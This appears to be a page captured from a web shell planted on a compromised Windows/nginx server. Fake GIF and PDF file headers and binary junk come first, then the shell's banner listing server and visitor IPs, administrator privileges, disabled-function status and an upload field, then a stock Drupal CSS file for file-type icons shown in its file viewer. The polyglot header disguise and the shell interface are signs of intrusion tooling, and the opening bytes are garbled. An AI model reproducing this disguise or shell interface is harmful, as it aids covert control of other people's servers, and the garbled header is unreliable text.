GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/themes/classy/css/components/ |
Upload File : |
/** * @file * Default style for file module. */ /* File icons.*/ .file { padding-left: 20px; /* LTR */ display: inline-block; min-height: 16px; background-repeat: no-repeat; background-position: left center; /* LTR */ } [dir="rtl"] .file { padding-left: inherit; padding-right: 20px; background-position: right center; } .file--general, .file--application-octet-stream { background-image: url(../../images/icons/application-octet-stream.png); } .file--package-x-generic { background-image: url(../../images/icons/package-x-generic.png); } .file--x-office-spreadsheet { background-image: url(../../images/icons/x-office-spreadsheet.png); } .file--x-office-document { background-image: url(../../images/icons/x-office-document.png); } .file--x-office-presentation { background-image: url(../../images/icons/x-office-presentation.png); } .file--text-x-script { background-image: url(../../images/icons/text-x-script.png); } .file--text-html { background-image: url(../../images/icons/text-html.png); } .file--text-plain { background-image: url(../../images/icons/text-plain.png); } .file--application-pdf { background-image: url(../../images/icons/application-pdf.png); } .file--application-x-executable { background-image: url(../../images/icons/application-x-executable.png); } .file--audio { background-image: url(../../images/icons/audio-x-generic.png); } .file--video { background-image: url(../../images/icons/video-x-generic.png); } .file--text { background-image: url(../../images/icons/text-x-generic.png); } .file--image { background-image: url(../../images/icons/image-x-generic.png); }